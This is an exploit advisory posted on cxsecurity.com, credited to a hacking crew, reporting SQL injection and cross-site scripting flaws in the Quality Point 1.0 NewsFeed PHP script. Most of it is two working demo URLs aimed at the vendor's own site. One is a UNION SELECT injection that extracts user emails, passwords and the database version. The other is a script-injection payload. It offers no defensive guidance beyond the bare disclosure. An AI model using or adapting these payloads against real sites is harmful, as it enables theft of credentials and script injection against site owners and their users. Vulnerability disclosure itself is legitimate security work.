Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities

2010.03.20
Credit: Red-D3v1L
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

sEc-r1z crEw The Leaders for Penetration Testing In Middle East. ================+ [?] ~ Note : sEc-r1z CrEw# r0x ! ========== [?] Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities ========== [?] My home: [ http://sec-r1z.com ] [?] For Ask: [r-d@passport.com] [?] Script: [ Quality Point 1.0 ] [?] home Script [ http://qualitypointtech.net ] [?] Language: [ PHP ] [?[ Best WishEs : [ The Love is End ... ] [?] Founder: [ Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# CrEw - Mr.Tro0oqy - r1z - Sas-TerrOrisT And All My Frindes ] ######################################################################## ===[ Exploit SQL ]=== [»]Exploit : path/showPage.php?id=[SQL injection ] [>>] Demo : http://qualitypointtech.net/NewsFeed/showPage.php?id=-348+union+select+1,concat%28email,0x3e,version%28%29,0x3e,password%29,3,4,5+from+qualityp_fnt.users%20-- ------------ ===[ Exploit XSS ]=== [»]Exploit : showPage.php?id=[XSS] [>>] Demo : http://qualitypointtech.net/NewsFeed/showPage.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E -----------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top